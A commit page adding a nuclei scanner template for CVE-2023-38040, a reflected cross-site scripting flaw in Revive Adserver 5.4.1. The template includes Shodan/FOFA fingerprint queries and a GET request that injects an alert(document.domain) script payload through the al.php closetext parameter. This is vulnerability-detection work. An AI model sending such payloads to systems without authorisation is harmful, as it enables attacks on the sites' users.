Merge pull request #11054 from projectdiscovery/CVE-2023-38040

Create CVE-2023-38040.yaml
projectdiscovery · Oct 22, 2024 · d0786f2 · d0786f2
2 parents df91090 + d64a9a8
commit d0786f2
Showing 1 changed file with 64 additions and 0 deletions.
diff --git a/http/cves/2023/CVE-2023-38040.yaml b/http/cves/2023/CVE-2023-38040.yaml
@@ -0,0 +1,64 @@
+id: CVE-2023-38040
+
+info:
+ name: Revive Adserver 5.4.1 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: medium
+ description: |
+ A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions.
+ impact: |
+ Allows attackers to execute malicious scripts in the context of a victim's browser
+ remediation: |
+ Upgrade Revive Adserver to version 5.4.2 or later to mitigate the vulnerability
+ reference:
+ - https://hackerone.com/reports/1694171
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-38040
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-38040
+ cwe-id: CWE-79
+ cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ shodan-query: http.favicon.hash:106844876
+ fofa-query: icon_hash="106844876"
+ vendor: revive-adserver
+ product: revive_adserver
+ tags: cve,cve2023,revive-adserver,xss
+
+flow: http(1) && http(2)
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ max-redirects: 2
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Revive Adserver'
+ internal: true
+
+ - method: GET
+ path:
+ - "{{BaseURL}}/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '<script>alert(document.domain);</script>'
+
+ - type: word
+ part: content_type
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200